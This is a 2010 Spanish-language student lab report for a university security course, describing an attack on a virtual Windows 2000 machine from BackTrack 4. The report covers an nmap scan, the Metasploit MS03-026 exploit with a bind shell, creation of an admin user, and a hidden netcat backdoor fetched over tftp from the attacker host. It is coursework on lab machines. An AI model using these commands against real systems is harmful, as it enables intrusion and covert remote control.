Informe Ataque informatico

17
UNPRG- ING. DE SISTEMAS Universidad Nacional “Pedro Ruiz Gallo” FACULTAD DE INGENIERÍA CIVIL SISTEMAS Y ARQUITECTURA Escuela Profesional de ingeniería de Sistemas ALUMNOS: Chávez Carranza, MARCO CURSO: Seguridad Informática DOCENTE: Puicán, ROBERTO Lambayeque, 2010 INTROMISION A UN SISTEMA OPERATIVO

Transcript of Informe Ataque informatico

Page 1: Informe Ataque informatico

1 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Universidad Nacional “Pedro Ruiz Gallo” FACULTAD DE INGENIERÍA CIVIL SISTEMAS Y ARQUITECTURA

Escuela Profesional de ingeniería de Sistemas

ALUMNOS:

Chávez Carranza, MARCO

CURSO:

Seguridad Informática

DOCENTE:

Puicán, ROBERTO

Lambayeque, 2010

INTROMISION A UN SISTEMA

OPERATIVO

Page 2: Informe Ataque informatico

2 Seguridad Informática

UNPRG- ING. DE SISTEMAS

ATAQUE INFORMÁTICO EJECUCIÓN

Se Desea hacer una intromisión desde BackTrack-4 a un computador con Sistema Operativo Windows Server 2000. PASO I (Reconocimiento de Nuestra Víctima)

Sabiendo el IP del computador víctima, nos queda averiguar los puertos vértices de ataque, para lo cual utilizaremos un Software de Mapeo (NMAP).

Como comando de mapeo utilizaremos a: <nmap –vv –P0 -sT> un TCP Connect(), solo queremos averiguar que puertos pueden estar abiertos y dirigir hacia {el nuestro ataque, el sondeo se ejecutara de esta manera:

o NMAP:

Page 3: Informe Ataque informatico

3 Seguridad Informática

UNPRG- ING. DE SISTEMAS

o Comando de Sondeo:

o Resultados:

Page 4: Informe Ataque informatico

4 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Éstos resultados nos muestran que puertos están sensible a ataques,, de los cuales elegiremos el

445 para nuestro caso, sin embargo podemos utilizar cualquiera de estos para nuestra pruebas, y

verificar la posibilidad de una intromisión de alguno de ellos

o Computador Víctima:

Ya tenemos reconocido el computador víctima Ahora!

PASO II (GENERALIDADES DEL ATACANTE)

o Software Atacante

Page 5: Informe Ataque informatico

5 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Para trabajar en modo visual iniciamos el proceso STARTX, además necesitamos iniciar el proceso

de Red para que BT4 reconozca la NIC instalada mediante el comando </etc/init.d/Networking

Start>, haremos esto antes de iniciar el STARTX, sin embargo podemos iniciarlo ya desde modo

visual ingresando a TERMINAL y escribimos el mismo comando

o Esperamos a cargar el sistema Tenemos el modo visual iniciado y verificamos en la direccion <Inicio->Settings->Internet & network-<>NetWork interfaces> visualizamos entonces la NIC de nuestra PC atacante.

Page 6: Informe Ataque informatico

6 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Ttenemos ahora lo necesario para hacer nuestra intromisión, Sigue!

PASO III (Ataque Propiamente Dicho)

o Carga de Servicios Necesarios: Cargamos el proceso: framework2-Msfweb <Inciio->BackTrack->Penetration->Metastploit Explotation framework->MsfWeb>

Para realizar la intromisión de software malicioso en un Sistema operativo, necesitamos

un puerto abierto, ademas de una aplicación que explote este puerto de modo que la

deje en modo Expuesto, de esta manera tomaremos el control de dicha

maquina, para lograr esto necesitamos un Exploit «Pieza de

software, un fragmento de datos, o una secuencia de comandos

con el fin de automatizar el aprovechamiento de un error, fallo o

vulnerabilidad, a fin de causar un comportamiento no deseado o

imprevisto en los programas informáticos, hardware, o

componente electrónico (por lo general computarizado) », dicho

esto, buscaremos los exploits disponibles, para lo cual ya hemos

levantado el proceso MSFWEB, y ahora desde el Firefox se nos serán

visibles.

Page 7: Informe Ataque informatico

7 Seguridad Informática

UNPRG- ING. DE SISTEMAS

o Desde el Firefox

En la barra de direcciones ingresaremos al localhost:55555, y nos ubicamos en EXPLOITS

Page 8: Informe Ataque informatico

8 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Buscamos el Exploit según el Sistema operativo atacado, en nuestro Caso es un Windows Server 2000 de modo que es tipo Win32>

Usaremos el Exploit «Microsoft RPC DCOM MS03-026»

Page 9: Informe Ataque informatico

9 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Seleccnionamos el Destino que en este Caso es 0-WindowsNT SP3-6ª/2K/XP/2K/Eng…

Utilizaremos la aplicación win32_bind

Page 10: Informe Ataque informatico

10 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Le indicamos el Ip del Computador Víctima «192.168.1.18»y como podemos ver el puerto vulnerable es el 135 -msrpc, puerto que a su vez se encuentra abierto en el sistema operativo según el mapeo realizado anteriormente.

Page 11: Informe Ataque informatico

11 Seguridad Informática

UNPRG- ING. DE SISTEMAS

En adelante tenemos la Shell remota y podemos tomar control de la maquina , por lo pronto hemos ingresado a su Sistema y tenemos Control Sobre su MS-DOS. A partir de ahora, teniendo el acceso remoto a la Shell del Computador Víctima, usaremos un software de control de comandos remotos, en este caso usaremos el AWRC (Atelier Web Remote Commander), que lo podemos descargar en (http://www.megaupload.com/?d=ZTATY555). Teniedo este acceso podemos crear un usuario, y posteriormente incluirle en el grupo de administradores.

Page 12: Informe Ataque informatico

12 Seguridad Informática

UNPRG- ING. DE SISTEMAS

PASO IV (Obtener un Escritorio Remoto)

Con Ayuda del Atelier Web Remote Commander que será instalada en un computador aleatoriamente ubicado, conectado en red con el resto de computadores, para nuestro caso como estamos trabajado con maquinas virtuales (Computador Atacante – Computador Víctima) el host del AWRC sera nuestra maquina Física, tendremos control sobre el computador Víctima:

Page 13: Informe Ataque informatico

13 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Ahora estamos viendo la vista en paralelo del control remoto sobre el computador víctima, a la derecha es el escritorio desde AWRC y a la izquierda es la maquina real.

Page 14: Informe Ataque informatico

14 Seguridad Informática

UNPRG- ING. DE SISTEMAS

PASO IV (BackDoor en la Maquina Atacada)

Despues de haber obtenido un escritorio remoto mediante AWRC, ponemos un backdoor para contolar de manera remora pero a la vez de manera oculta para el host atacado.

En el terminal del Backtrack ingresamos en:

Dentro del terminal en BackTrack escribimos:

o cd /ls/pentest/windows-binaries/tools

Localizamos el archivo nc.exe y lo copiamos con “cp nc.exe /tmp”.

Lo verificamos con “ls/tmp”.

Escribimos en Comand de BackTrack en la sesion iniciada con el exploit: “tftp -i 192.168.1.207 get nc.exe C:\nc.exe”

Page 15: Informe Ataque informatico

15 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Ahora editamos el registro

Page 16: Informe Ataque informatico

16 Seguridad Informática

UNPRG- ING. DE SISTEMAS

Page 17: Informe Ataque informatico

17 Seguridad Informática

UNPRG- ING. DE SISTEMAS

nc –p 69 192.168.1.34 69